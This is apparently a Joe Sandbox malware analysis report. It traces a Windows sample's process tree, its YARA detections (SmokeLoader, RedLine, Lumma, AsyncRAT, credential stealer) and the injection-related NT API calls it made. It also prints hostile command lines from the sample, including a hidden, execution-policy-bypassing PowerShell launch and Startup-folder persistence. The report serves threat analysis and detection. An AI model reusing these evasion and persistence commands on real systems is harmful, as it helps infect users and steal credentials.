S4L68RboipykREDnMxkn4ZBOKxCBruwmGd1D1eyfILjdv3jsIsxHQQWWMSrU/dW7V3IjPmn08Quz6xoY3oMSts8yYIOkj3SLgur8GgoUNzV9umJQM+WYhCQotctGRIS9IFvrMSSO744J4XGDG9VPdDF3q7ZgLVp+gO9TlFTu16cqrY6cRswdFIwstUn1vUNYwxT7meOT9m6ABWDuN7KH+l5f+vYIdxrZS9rYWQKA9KiHZKSwtHz4fqR5Dc5MSsP

Target ID:	0
Start time:	02:52:55
Start date:	27/07/2024
Path:	C:\Users\user\Desktop\FpiUD4nYpj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FpiUD4nYpj.exe"
Imagebase:	0x400000
File size:	232'960 bytes
MD5 hash:	8F183D95F41F213F3413F7C59F58241F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1731949971.00000000026F0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1732147386.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:53:01
Start date:	27/07/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	02:53:20
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Roaming\jjistfr
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\jjistfr
Imagebase:	0x400000
File size:	232'960 bytes
MD5 hash:	8F183D95F41F213F3413F7C59F58241F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1964638535.00000000040B1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1964481125.000000000258D000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000003.00000002.1964603084.0000000004090000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1964408969.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:54:02
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\2FBE.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\2FBE.exe
Imagebase:	0x7ff764860000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:54:02
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:54:16
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\34CA.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\34CA.exe
Imagebase:	0x7ff65b6b0000
File size:	11'672'576 bytes
MD5 hash:	D3785ED170CDB1F4784D3DFF3A61DAE0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000000.2466826859.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000008.00000002.2601744896.00007FF65BBF0000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\AppData\Local\Temp\34CA.exe, Author: Joe Security
Antivirus matches:	Detection: 50%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:54:22
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\BD9E.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\BD9E.exe
Imagebase:	0x1dccc260000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:54:23
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\BD9E.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\BD9E.exe" -HOSTRUNAS
Imagebase:	0x15bd9420000
File size:	141'944 bytes
MD5 hash:	B6A1C0998D0A7979C9EC17B8D5CF8A81
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:54:28
Start date:	27/07/2024
Path:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Imagebase:	0x910000
File size:	231'736 bytes
MD5 hash:	A64BEAB5D4516BECA4C40B25DC0C1CD8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2644907653.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2613784729.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2645696277.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2666588683.0000000002FD9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2632557485.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2666017373.0000000003011000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2613300795.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2644409478.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2631526881.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2644907653.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2612260038.000000000300D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2645696277.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000003.2666377646.0000000002FB8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:54:31
Start date:	27/07/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:54:31
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:54:41
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat
Imagebase:	0x7ff684d10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:54:41
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat
Imagebase:	0x7ff684d10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	02:54:41
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Wow64 process (32bit):	true
Commandline:	"vm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000012.00000002.4106101148.0000000000060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000012.00000002.4114154243.00000000029E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	02:54:41
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe
Wow64 process (32bit):	true
Commandline:	"lm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.2832025974.0000000000613000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000003.2830110398.0000000000610000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.3185231236.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000013.00000002.3151962784.0000000000060000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:54:50
Start date:	27/07/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs"
Imagebase:	0x7ff793dd0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	02:54:52
Start date:	27/07/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" "
Imagebase:	0x7ff684d10000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	02:54:52
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:54:52
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
Wow64 process (32bit):	true
Commandline:	"vm.exe"
Imagebase:	0x400000
File size:	40'376 bytes
MD5 hash:	F1B14F71252DE9AC763DBFBFBFC8C2DC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000019.00000002.3260078878.0000000006010000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000019.00000002.3248787304.0000000004E40000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000019.00000002.3139489097.00000000005C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:54:57
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1128
Imagebase:	0x7e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:55:05
Start date:	27/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1848
Imagebase:	0x7e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:55:40
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\2FBE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\2FBE.exe"
Imagebase:	0x7ff764860000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	02:55:40
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:55:49
Start date:	27/07/2024
Path:	C:\Users\user\AppData\Local\Temp\2FBE.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\2FBE.exe"
Imagebase:	0x7ff764860000
File size:	988'672 bytes
MD5 hash:	2B3ECC21382E825D6FE0812A717717EB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:55:49
Start date:	27/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	39.3%
Signature Coverage:	53.6%
Total number of Nodes:	84
Total number of Limit Nodes:	4

Executed Functions

Function 00401513 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction ID: ebc0160933c68a8b7ae7f1ca7eda0dd03739b2ad6b995580a9f4ea7b057fd4c7
Opcode Fuzzy Hash: 885e936b73f6e8672a606013276db408b22f0ef5eb4ebd1effef6bd76d7f6a50
Instruction Fuzzy Hash: AB616171600204FBEB209F95DC49FAF7BB8EF85B00F14412AFA12BA1E4D7759A01DB25

Function 0040151E Relevance: 10.7, APIs: 7, Instructions: 178
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction ID: 81614cc47252d4ee750cd10e5f363bec598540b14c8849c2392ba6a7819565d6
Opcode Fuzzy Hash: a8b1234f8d45d2fb401cfb213eb4a96e35d5497f76bb2019505792229240a42f
Instruction Fuzzy Hash: 8B5137B1900248BFEF209F91CC49FEFBBB8EF85B00F144159FA11BA2A5D6759905CB24

Function 00401553 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D0
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015FD
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401620
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040163E
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040167F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B0
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D2

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction ID: d0bd6428bf20664bceabbb55207a57fb76a02318494b8c1f9a1cb2173d989cf6
Opcode Fuzzy Hash: e5a74de420fb2eda0c6ba418abc3b2a4ecf354f77255eeea8c235c1433f6c9fb
Instruction Fuzzy Hash: 565128B1900249BBEF209F91CC48FAFBBB8EF85B10F144159FA11BA2A5D7719941CB24

Function 00402FD3 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403107
NtTerminateProcess.NTDLL ref: 00403120

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: c5f1771b03d6f6f48bc893f8c69e4bd59083146a95f7f1e574921d9c63f51eee
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 9A412631218E088FD768EE6CA84576277D5FB98311F6643AAE809D3389FE34DC1183C9

Function 00403149 Relevance: 3.1, APIs: 2, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1730718562.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FpiUD4nYpj.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction ID: 15e76b100028984b8ee99d2dec5c44828c89a921298bb6101f651bfb9f41234e
Opcode Fuzzy Hash: 0998c5da932cb652e732e08efa62070a5860df8833ed3ae03222be4492deafee
Instruction Fuzzy Hash: 6F0128315186048BE7285E799886226BFA5EF18337F28037FD122E87D1E13E8707964F

Function 027347BE Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 027347E6
Module32First.KERNEL32(00000000,00000224), ref: 02734806

Memory Dump Source

Source File: 00000000.00000002.1732060091.000000000272D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0272D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_272d000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 81c1bbb3720f10a10977062e307ec15260ef29cb512ea2e679f9125429d2359e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: E1F096362007116BD7253BF5A89DBAE76F8AF4A728F100529E652914C1DB70E8458A61

Function 026E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 026E024D

Strings

kernel32.dll, xrefs: 026E008F, 026E0095
cess, xrefs: 026E018D

Memory Dump Source

Source File: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: f72ae1ea722be14b2459ee282943af6ad2a101b6dfd3519f2362ee7df3398fe5
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 06526974A01229DFDB64CF58C985BACBBB1BF09304F1480D9E94EAB351DB70AA85CF14

Function 026E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,026E0223,?,?), ref: 026E0E19
SetErrorMode.KERNELBASE(00000000,?,?,026E0223,?,?), ref: 026E0E1E

Memory Dump Source

Source File: 00000000.00000002.1731925508.00000000026E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_26e0000_FpiUD4nYpj.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: b2cad5673d59e3f33c04b078aaa78f4ac216478fcc09ce84b1cd0ac0d0e9666a
